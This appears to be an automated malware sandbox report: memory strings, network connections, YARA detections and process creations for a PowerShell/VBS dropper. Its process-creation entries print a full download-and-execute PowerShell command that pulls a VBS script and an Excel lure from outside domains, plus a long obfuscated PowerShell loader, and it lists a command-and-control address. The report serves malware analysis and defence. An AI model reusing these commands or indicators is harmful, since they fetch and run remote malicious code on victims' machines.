                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5A4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: powershell.exe, 00000001.00000002.2955122133.000001CC35088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fornid.com
                        Source: powershell.exe, 00000006.00000002.1849625664.000001E35A388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftsengineers.com
                        Source: powershell.exe, 00000006.00000002.1895709724.000001E370DF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coo
                        Source: powershell.exe, 00000001.00000002.3025434568.000001CC43750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3025434568.000001CC43886000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2955122133.000001CC35117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000006.00000002.1849625664.000001E358816000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000001.00000002.2955122133.000001CC336D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849625664.000001E3585F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2092971227.0000000004201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000001.00000002.2955122133.000001CC34CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tequila.ae
                        Source: powershell.exe, 00000006.00000002.1849625664.000001E358816000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000001.00000002.2955122133.000001CC35088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com
                        Source: powershell.exe, 00000006.00000002.1849625664.000001E35A388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ftsengineers.com
                        Source: powershell.exe, 00000006.00000002.1895709724.000001E370DF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                        Source: powershell.exe, 00000006.00000002.1895709724.000001E370DF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 00000001.00000002.2955122133.000001CC34CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tequila.ae
                        Source: svchost.exe, svchost.exe, 00000012.00000002.2783183945.000002435DCD1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2783151962.000002435DCCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22gl
                        Source: svchost.exe, 00000012.00000002.2783183945.000002435DCD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glSymb
                        Source: svchost.exe, 00000011.00000003.2355766793.000000000370C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glkernelbasentdllkernel32GetProcessMitig
                        Source: svchost.exe, 00000011.00000002.2356157723.00000000032BC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glx
                        Source: svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: powershell.exe, 00000001.00000002.2955122133.000001CC336D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849625664.000001E3585F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000009.00000002.2092971227.0000000004201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: svchost.exe, 00000012.00000003.2510299112.000002435DC13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                        Source: svchost.exe, 00000011.00000003.2287273703.000000000379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                        Source: svchost.exe, 00000011.00000003.2287273703.000000000379F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                        Source: powershell.exe, 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: svchost.exe, 00000012.00000003.2510722230.000002435DC0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2510675719.000002435DC0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                        Source: svchost.exe, 00000012.00000003.2510722230.000002435DC0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2510675719.000002435DC0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com
                        Source: svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5AA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1964293277.0000027BC5AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                        Source: powershell.exe, 00000006.00000002.1849625664.000001E358816000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000001.00000002.2955122133.000001CC342FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849625664.000001E3591BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000001.00000002.3025434568.000001CC43750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3025434568.000001CC43886000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2955122133.000001CC35117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                        Source: svchost.exe, 0000000F.00000003.1964293277.0000027BC5A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                        Source: svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: powershell.exe, 00000001.00000002.2955122133.000001CC34CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
                        Source: powershell.exe, 00000001.00000002.2955122133.000001CC34CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ab/List
                        Source: powershell.exe, 00000001.00000002.2949759804.000001CC317F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2955122133.000001CC34CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2953028908.000001CC31B95000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3037983335.000001CC4BA90000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2510299112.000002435DC13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ab/List%20of%20required%20items.xlsx
                        Source: powershell.exe, 00000006.00000002.1849625664.000001E358816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849625664.000001E35A382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com
                        Source: powershell.exe, 00000006.00000002.1849625664.000001E358816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849625664.000001E359BBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2092971227.0000000004355000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com/it/Emnernes123.mdp
                        Source: svchost.exe, 00000012.00000003.2503618149.000002435DC2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: powershell.exe, 00000006.00000002.1849625664.000001E358816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849625664.000001E359BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.puneet.ae/it/Emnernes123.mdp
                        Source: powershell.exe, 00000009.00000002.2092971227.0000000004355000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.puneet.ae/it/Emnernes123.mdpt
                        Source: msiexec.exe, 00000010.00000002.2268662675.00000000050AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/
                        Source: msiexec.exe, 00000010.00000002.2268662675.00000000050AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/a
                        Source: msiexec.exe, 00000010.00000002.2268662675.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.2269347949.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.2268662675.000000000506A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.bin
                        Source: msiexec.exe, 00000010.00000002.2269347949.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.binIdensUndwww.tequila.ae/ab/ab.bin
                        Source: powershell.exe, 00000001.00000002.2955122133.000001CC342FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tequila.ae
                        Source: powershell.exe, 00000001.00000002.2949759804.000001CC317F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2955122133.000001CC342FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2953028908.000001CC31B95000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2510299112.000002435DC13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tequila.ae/wh/wh.vbs
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownHTTPS traffic detected: 209.124.66.28:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 103.53.42.63:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49754 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49870 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49885 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49903 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49920 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49938 version: TLS 1.2
                        Source: msiexec.exe, 00000010.00000003.2265412347.0000000021160000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_816bb5e0-6
                        Source: msiexec.exe, 00000010.00000003.2265412347.0000000021160000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_423fb14f-1
                        Source: Yara matchFile source: 17.3.svchost.exe.5a80000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.svchost.exe.5860000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.svchost.exe.5860000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.3.msiexec.exe.21380000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.svchost.exe.5a80000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.3.msiexec.exe.21160000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.svchost.exe.5860000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000003.2268669701.0000000005A80000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.2268437168.0000000005860000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.2265412347.0000000021160000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.2265773388.0000000021380000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5316, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4820, type: MEMORYSTR
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF4415808CC CreateDesktopW,CreateProcessW,GetExitCodeProcess,TerminateProcess,18_3_00007DF4415808CC

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: amsi32_7260.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7260, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelB
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelBJump to behavior
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44158E094 NtAcceptConnectPort,18_3_00007DF44158E094
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44158E170 NtAcceptConnectPort,18_3_00007DF44158E170
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44158E150 NtAcceptConnectPort,18_3_00007DF44158E150
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44158F32C NtAcceptConnectPort,free,18_3_00007DF44158F32C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44158F180 malloc,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,free,18_3_00007DF44158F180
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44158E25C NtAcceptConnectPort,18_3_00007DF44158E25C
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44158E3E8 NtAcceptConnectPort,18_3_00007DF44158E3E8
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44158E3C8 NtAcceptConnectPort,18_3_00007DF44158E3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 18_3_00007DF44158E910 calloc,DuplicateHandle,NtAcceptConnectPort,free,NtAcceptConnectPort,NtAcceptConnectPort,18_3_00007DF44158E910
                        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002435D421CF4 NtAcceptConnectPort,CloseHandle,18_2_000002435D421CF4
                        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002435D4215C0 NtAcceptConnectPort,18_2_000002435D4215C0
